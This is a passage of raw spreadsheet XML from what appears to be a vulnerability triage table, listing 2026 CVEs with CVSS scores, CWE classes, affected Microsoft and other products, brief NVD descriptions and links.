t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52770</t></is></c></row><row r="1100"><c r="A1100" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1100" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1100" s="5" t="inlineStr"><is><t>CVE-2026-54598</t></is></c><c r="D1100" s="5" t="n"><v>7.5</v></c><c r="E1100" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1100" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1100" s="5" t="inlineStr" /><c r="H1100" s="5" t="n"><v>0.003</v></c><c r="I1100" s="5" t="inlineStr" /><c r="J1100" s="5" t="inlineStr" /><c r="K1100" s="5" t="inlineStr" /><c r="L1100" s="5" t="inlineStr" /><c r="M1100" s="5" t="inlineStr" /><c r="N1100" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1100" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P1100" s="5" t="inlineStr" /><c r="Q1100" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R1100" s="5" t="inlineStr"><is><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is></c><c r="S1100" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-54598</t></is></c></row><row r="1101"><c r="A1101" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1101" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1101" s="5" t="inlineStr"><is><t>CVE-2026-54599</t></is></c><c r="D1101" s="5" t="n"><v>7.5</v></c><c r="E1101" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1101" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1101" s="5" t="inlineStr" /><c r="H1101" s="5" t="n"><v>0.002</v></c><c r="I1101" s="5" t="inlineStr" /><c r="J1101" s="5" t="inlineStr" /><c r="K1101" s="5" t="inlineStr" /><c r="L1101" s="5" t="inlineStr" /><c r="M1101" s="5" t="inlineStr" /><c r="N1101" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1101" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P1101" s="5" t="inlineStr" /><c r="Q1101" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="R1101" s="5" t="inlineStr"><is><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is></c><c r="S1101" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-54599</t></is></c></row><row r="1102"><c r="A1102" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1102" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1102" s="5" t="inlineStr"><is><t>CVE-2026-55215</t></is></c><c r="D1102" s="5" t="n"><v>7.5</v></c><c r="E1102" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1102" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1102" s="5" t="inlineStr" /><c r="H1102" s="5" t="n"><v>0.004</v></c><c r="I1102" s="5" t="inlineStr" /><c r="J1102" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1102" s="5" t="inlineStr" /><c r="L1102" s="5" t="inlineStr" /><c r="M1102" s="5" t="inlineStr" /><c r="N1102" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1102" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1102" s="5" t="inlineStr" /><c r="Q1102" s="5" t="inlineStr"><is><t>CWE-295, CWE-522</t></is></c><c r="R1102" s="5" t="inlineStr"><is><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is></c><c r="S1102" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55215</t></is></c></row><row r="1103"><c r="A1103" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1103" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1103" s="5" t="inlineStr"><is><t>CVE-2026-55552</t></is></c><c r="D1103" s="5" t="n"><v>7.5</v></c><c r="E1103" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1103" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1103" s="5" t="inlineStr" /><c r="H1103" s="5" t="n"><v>0.004</v></c><c r="I1103" s="5" t="inlineStr" /><c r="J1103" s="5" t="inlineStr" /><c r="K1103" s="5" t="inlineStr" /><c r="L1103" s="5" t="inlineStr" /><c r="M1103" s="5" t="inlineStr" /><c r="N1103" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1103" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1103" s="5" t="inlineStr" /><c r="Q1103" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1103" s="5" t="inlineStr"><is><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is></c><c r="S1103" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55552</t></is></c></row><row r="1104"><c r="A1104" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1104" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1104" s="5" t="inlineStr"><is><t>CVE-2026-55784</t></is></c><c r="D1104" s="5" t="n"><v>7.5</v></c><c r="E1104" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1104" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1104" s="5" t="inlineStr" /><c r="H1104" s="5" t="n"><v>0.003</v></c><c r="I1104" s="5" t="inlineStr" /><c r="J1104" s="5" t="inlineStr" /><c r="K1104" s="5" t="inlineStr" /><c r="L1104" s="5" t="inlineStr" /><c r="M1104" s="5" t="inlineStr" /><c r="N1104" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1104" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1104" s="5" t="inlineStr" /><c r="Q1104" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="R1104" s="5" t="inlineStr"><is><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is></c><c r="S1104" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55784</t></is></c></row><row r="1105"><c r="A1105" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1105" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1105" s="5" t="inlineStr"><is><t>CVE-2026-57098</t></is></c><c r="D1105" s="5" t="n"><v>7.5</v></c><c r="E1105" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1105" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1105" s="5" t="inlineStr" /><c r="H1105" s="5" t="n"><v>0.006</v></c><c r="I1105" s="5" t="inlineStr" /><c r="J1105" s="5" t="inlineStr" /><c r="K1105" s="5" t="inlineStr"><is><t>microsoft:remote_desktop_client</t></is></c><c r="L1105" s="5" t="inlineStr" /><c r="M1105" s="5" t="inlineStr" /><c r="N1105" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1105" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1105" s="5" t="inlineStr" /><c r="Q1105" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="R1105" s="5" t="inlineStr"><is><t>Improper verification of cryptographic signature in Windows RDP Client allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1105" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-57098</t></is></c></row><row r="1106"><c r="A1106" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1106" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1106" s="5" t="inlineStr"><is><t>CVE-2026-57099</t></is></c><c r="D1106" s="5" t="n"><v>7.5</v></c><c r="E1106" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1106" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1106" s="5" t="inlineStr" /><c r="H1106" s="5" t="n"><v>0.008</v></c><c r="I1106" s="5" t="inlineStr" /><c r="J1106" s="5" t="inlineStr" /><c r="K1106" s="5" t="inlineStr" /><c r="L1106" s="5" t="inlineStr" /><c r="M1106" s="5" t="inlineStr" /><c r="N1106" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1106" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1106" s="5" t="inlineStr" /><c r="Q1106" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R1106" s="5" t="inlineStr"><is><t>Allocation of resources without limits or throttling in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1106" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-57099</t></is></c></row><row r="1107"><c r="A1107" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1107" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1107" s="5" t="inlineStr"><is><t>CVE-2026-62759</t></is></c><c r="D1107" s="5" t="n"><v>7.5</v></c><c r="E1107" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1107" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1107" s="5" t="inlineStr" /><c r="H1107" s="5" t="n"><v>0.003</v></c><c r="I1107" s="5" t="inlineStr" /><c r="J1107" s="5" t="inlineStr" /><c r="K1107" s="5" t="inlineStr" /><c r="L1107" s="5" t="inlineStr" /><c r="M1107" s="5" t="inlineStr" /><c r="N1107" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1107" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1107" s="5" t="inlineStr" /><c r="Q1107" s="5" t="inlineStr"><is><t>CWE-290</t></is></c><c r="R1107" s="5" t="inlineStr"><is><t>Authentication bypass by spoofing in Windows Netlogon allows an unauthorized attacker to perform spoofing over an adjacent network.</t></is></c><c r="S1107" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62759</t></is></c></row><row r="1108"><c r="A1108" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1108" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1108" s="5" t="inlineStr"><is><t>CVE-2026-62813</t></is></c><c r="D1108" s="5" t="n"><v>7.5</v></c><c r="E1108" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1108" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1108" s="5" t="inlineStr" /><c r="H1108" s="5" t="n"><v>0.006</v></c><c r="I1108" s="5" t="inlineStr" /><c r="J1108" s="5" t="inlineStr" /><c r="K1108" s="5" t="inlineStr" /><c r="L1108" s="5" t="inlineStr" /><c r="M1108" s="5" t="inlineStr" /><c r="N1108" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1108" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1108" s="5" t="inlineStr" /><c r="Q1108" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1108" s="5" t="inlineStr"><is><t>Use after free in Active Directory Domain Services allows an authorized attacker to execute code over a network.</t></is></c><c r="S1108" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62813</t></is></c></row><row r="1109"><c r="A1109" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1109" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1109" s="5" t="inlineStr"><is><t>CVE-2026-66304</t></is></c><c r="D1109" s="5" t="n"><v>7.5</v></c><c r="E1109" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1109" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1109" s="5" t="inlineStr" /><c r="H1109" s="5" t="n"><v>0.007</v></c><c r="I1109" s="5" t="inlineStr" /><c r="J1109" s="5" t="inlineStr" /><c r="K1109" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1109" s="5" t="inlineStr" /><c r="M1109" s="5" t="inlineStr" /><c r="N1109" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1109" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1109" s="5" t="inlineStr" /><c r="Q1109" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1109" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Skype for Business allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1109" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66304</t></is></c></row><row r="1110"><c r="A1110" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1110" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1110" s="5" t="inlineStr"><is><t>CVE-2026-66307</t></is></c><c r="D1110" s="5" t="n"><v>7.5</v></c><c r="E1110" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1110" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1110" s="5" t="inlineStr" /><c r="H1110" s="5" t="n"><v>0.006</v></c><c r="I1110" s="5" t="inlineStr" /><c r="J1110" s="5" t="inlineStr" /><c r="K1110" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1110" s="5" t="inlineStr" /><c r="M1110" s="5" t="inlineStr" /><c r="N1110" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1110" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1110" s="5" t="inlineStr" /><c r="Q1110" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="R1110" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Skype for Business allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1110" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66307</t></is></c></row><row r="1111"><c r="A1111" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1111" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1111" s="5" t="inlineStr"><is><t>CVE-2026-67376</t></is></c><c r="D1111" s="5" t="n"><v>7.5</v></c><c r="E1111" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1111" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1111" s="5" t="inlineStr" /><c r="H1111" s="5" t="n"><v>0.008</v></c><c r="I1111" s="5" t="inlineStr" /><c r="J1111" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1111" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1111" s="5" t="inlineStr" /><c r="M1111" s="5" t="inlineStr" /><c r="N1111" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1111" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1111" s="5" t="inlineStr" /><c r="Q1111" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R1111" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1111" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67376</t></is></c></row><row r="1112"><c r="A1112" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1112" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1112" s="5" t="inlineStr"><is><t>CVE-2026-68887</t></is></c><c r="D1112" s="5" t="n"><v>7.5</v></c><c r="E1112" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1112" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1112" s="5" t="inlineStr" /><c r="H1112" s="5" t="n"><v>0.008</v></c><c r="I1112" s="5" t="inlineStr" /><c r="J1112" s="5" t="inlineStr" /><c r="K1112" s="5" t="inlineStr" /><c r="L1112" s="5" t="inlineStr" /><c r="M1112" s="5" t="inlineStr" /><c r="N1112" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1112" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1112" s="5" t="inlineStr" /><c r="Q1112" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1112" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Message Queuing Queue Manager allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1112" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68887</t></is></c></row><row r="1113"><c r="A1113" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1113" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1113" s="5" t="inlineStr"><is><t>CVE-2026-69329</t></is></c><c r="D1113" s="5" t="n"><v>7.5</v></c><c r="E1113" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1113" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1113" s="5" t="inlineStr" /><c r="H1113" s="5" t="n"><v>0.011</v></c><c r="I1113" s="5" t="inlineStr" /><c r="J1113" s="5" t="inlineStr" /><c r="K1113" s="5" t="inlineStr" /><c r="L1113" s="5" t="inlineStr" /><c r="M1113" s="5" t="inlineStr" /><c r="N1113" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1113" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1113" s="5" t="inlineStr" /><c r="Q1113" s="5" t="inlineStr"><is><t>CWE-125, CWE-190</t></is></c><c r="R1113" s="5" t="inlineStr"><is><t>Out-of-bounds read in BranchCache allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1113" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69329</t></is></c></row><row r="1114"><c r="A1114" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1114" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1114" s="5" t="inlineStr"><is><t>CVE-2026-69342</t></is></c><c r="D1114" s="5" t="n"><v>7.5</v></c><c r="E1114" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1114" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1114" s="5" t="inlineStr" /><c r="H1114" s="5" t="n"><v>0.011</v></c><c r="I1114" s="5" t="inlineStr" /><c r="J1114" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1114" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1114" s="5" t="inlineStr" /><c r="M1114" s="5" t="inlineStr" /><c r="N1114" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1114" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1114" s="5" t="inlineStr" /><c r="Q1114" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1114" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1114" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69342</t></is></c></row><row r="1115"><c r="A1115" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1115" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1115" s="5" t="inlineStr"><is><t>CVE-2026-69378</t></is></c><c r="D1115" s="5" t="n"><v>7.5</v></c><c r="E1115" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1115" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1115" s="5" t="inlineStr" /><c r="H1115" s="5" t="n"><v>0.011</v></c><c r="I1115" s="5" t="inlineStr" /><c r="J1115" s="5" t="inlineStr" /><c r="K1115" s="5" t="inlineStr" /><c r="L1115" s="5" t="inlineStr" /><c r="M1115" s="5" t="inlineStr" /><c r="N1115" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1115" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1115" s="5" t="inlineStr" /><c r="Q1115" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="R1115" s="5" t="inlineStr"><is><t>Uncontrolled recursion in Microsoft Exchange Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1115" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69378</t></is></c></row><row r="1116"><c r="A1116" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1116" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1116" s="5" t="inlineStr"><is><t>CVE-2026-69397</t></is></c><c r="D1116" s="5" t="n"><v>7.5</v></c><c r="E1116" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1116" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1116" s="5" t="inlineStr" /><c r="H1116" s="5" t="n"><v>0.006</v></c><c r="I1116" s="5" t="inlineStr" /><c r="J1116" s="5" t="inlineStr"><is><t>openssh</t></is></c><c r="K1116" s="5" t="inlineStr" /><c r="L1116" s="5" t="inlineStr" /><c r="M1116" s="5" t="inlineStr" /><c r="N1116" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1116" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1116" s="5" t="inlineStr" /><c r="Q1116" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1116" s="5" t="inlineStr"><is><t>Use after free in OpenSSH for Windows allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S1116" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69397</t></is></c></row><row r="1117"><c r="A1117" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1117" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1117" s="5" t="inlineStr"><is><t>CVE-2026-69428</t></is></c><c r="D1117" s="5" t="n"><v>7.5</v></c><c r="E1117" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1117" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1117" s="5" t="inlineStr" /><c r="H1117" s="5" t="n"><v>0.011</v></c><c r="I1117" s="5" t="inlineStr" /><c r="J1117" s="5" t="inlineStr" /><c r="K1117" s="5" t="inlineStr" /><c r="L1117" s="5" t="inlineStr" /><c r="M1117" s="5" t="inlineStr" /><c r="N1117" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1117" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1117" s="5" t="inlineStr" /><c r="Q1117" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1117" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1117" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69428</t></is></c></row><row r="1118"><c r="A1118" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1118" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1118" s="5" t="inlineStr"><is><t>CVE-2026-69429</t></is></c><c r="D1118" s="5" t="n"><v>7.5</v></c><c r="E1118" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1118" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1118" s="5" t="inlineStr" /><c r="H1118" s="5" t="n"><v>0.006</v></c><c r="I1118" s="5" t="inlineStr" /><c r="J1118" s="5" t="inlineStr" /><c r="K1118" s="5" t="inlineStr" /><c r="L1118" s="5" t="inlineStr" /><c r="M1118" s="5" t="inlineStr" /><c r="N1118" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1118" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1118" s="5" t="inlineStr" /><c r="Q1118" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1118" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows IKE Extension allows an authorized attacker to execute code over a network.</t></is></c><c r="S1118" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69429</t></is></c></row><row r="1119"><c r="A1119" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1119" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1119" s="5" t="inlineStr"><is><t>CVE-2026-69443</t></is></c><c r="D1119" s="5" t="n"><v>7.5</v></c><c r="E1119" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1119" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1119" s="5" t="inlineStr" /><c r="H1119" s="5" t="n"><v>0.01</v></c><c r="I1119" s="5" t="inlineStr" /><c r="J1119" s="5" t="inlineStr" /><c r="K1119" s="5" t="inlineStr" /><c r="L1119" s="5" t="inlineStr" /><c r="M1119" s="5" t="inlineStr" /><c r="N1119" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1119" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1119" s="5" t="inlineStr" /><c r="Q1119" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1119" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Device Health Attestation (DHA) allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1119" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69443</t></is></c></row><row r="1120"><c r="A1120" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1120" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1120" s="5" t="inlineStr"><is><t>CVE-2026-69514</t></is></c><c r="D1120" s="5" t="n"><v>7.5</v></c><c r="E1120" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1120" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1120" s="5" t="inlineStr" /><c r="H1120" s="5" t="n"><v>0.007</v></c><c r="I1120" s="5" t="inlineStr" /><c r="J1120" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K112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20" s="5" t="inlineStr" /><c r="M1120" s="5" t="inlineStr" /><c r="N1120" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1120" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1120" s="5" t="inlineStr" /><c r="Q1120" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1120" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="S1120" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69514</t></is></c></row><row r="1121"><c r="A1121" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1121" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1121" s="5" t="inlineStr"><is><t>CVE-2026-69539</t></is></c><c r="D1121" s="5" t="n"><v>7.5</v></c><c r="E1121" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1121" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1121" s="5" t="inlineStr" /><c r="H1121" s="5" t="n"><v>0.005</v></c><c r="I1121" s="5" t="inlineStr" /><c r="J1121" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K112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21" s="5" t="inlineStr" /><c r="M1121" s="5" t="inlineStr" /><c r="N1121" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1121" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1121" s="5" t="inlineStr" /><c r="Q1121" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1121" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="S1121" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69539</t></is></c></row><row r="1122"><c r="A1122" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1122" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1122" s="5" t="inlineStr"><is><t>CVE-2026-69587</t></is></c><c r="D1122" s="5" t="n"><v>7.5</v></c><c r="E1122" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1122" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1122" s="5" t="inlineStr" /><c r="H1122" s="5" t="n"><v>0.012</v></c><c r="I1122" s="5" t="inlineStr" /><c r="J1122" s="5" t="inlineStr" /><c r="K1122" s="5" t="inlineStr" /><c r="L1122" s="5" t="inlineStr" /><c r="M1122" s="5" t="inlineStr" /><c r="N1122" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1122" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1122" s="5" t="inlineStr" /><c r="Q1122" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="R1122" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1122" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69587</t></is></c></row><row r="1123"><c r="A1123" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1123" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1123" s="5" t="inlineStr"><is><t>CVE-2026-69588</t></is></c><c r="D1123" s="5" t="n"><v>7.5</v></c><c r="E1123" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1123" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1123" s="5" t="inlineStr" /><c r="H1123" s="5" t="n"><v>0.012</v></c><c r="I1123" s="5" t="inlineStr" /><c 